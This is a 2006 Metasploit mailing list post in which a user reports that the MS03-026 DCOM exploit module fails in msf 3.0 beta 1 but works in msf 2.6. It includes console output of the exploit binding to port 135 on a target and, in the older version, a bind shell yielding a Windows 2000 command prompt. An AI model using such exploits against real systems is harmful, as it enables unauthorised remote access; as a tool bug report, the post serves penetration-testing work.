Metasploit mailing list archives

ms03_026_dcom broken in msf 3.0 ?


From: thomas.werth at vahle.de (Thomas Werth)
Date: Mon, 21 Aug 2006 10:53:49 +0200

Looks like windows/dcerpc/ms03_026_dcom is broken in msf 3.0 beta 1

msf exploit(ms03_026_dcom) > exploit
[*] Started bind handler
[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] Binding to
4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0 at ncacn_ip_tcp:172.22.5.88[135] ...
[*] Bound to
4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0 at ncacn_ip_tcp:172.22.5.88[135] ...
[*] Sending exploit ...
[-] Exploit failed: DCERPC FAULT => nca_s_fault_ndr
msf exploit(ms03_026_dcom) >


when using msf 2.6 exploit runs fine :

msf msrpc_dcom_ms03_026(win32_bind) > exploit
[*] Starting Bind Handler.
[*] Sending request...
[*] Got connection from XXX.XXX.XXX.XXX:40478 <-> XXX.XXX.XXX.XXX:4444

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>

Hopefully this is right place to report that , i'm sorry if i send it to
wrong list .



Current thread: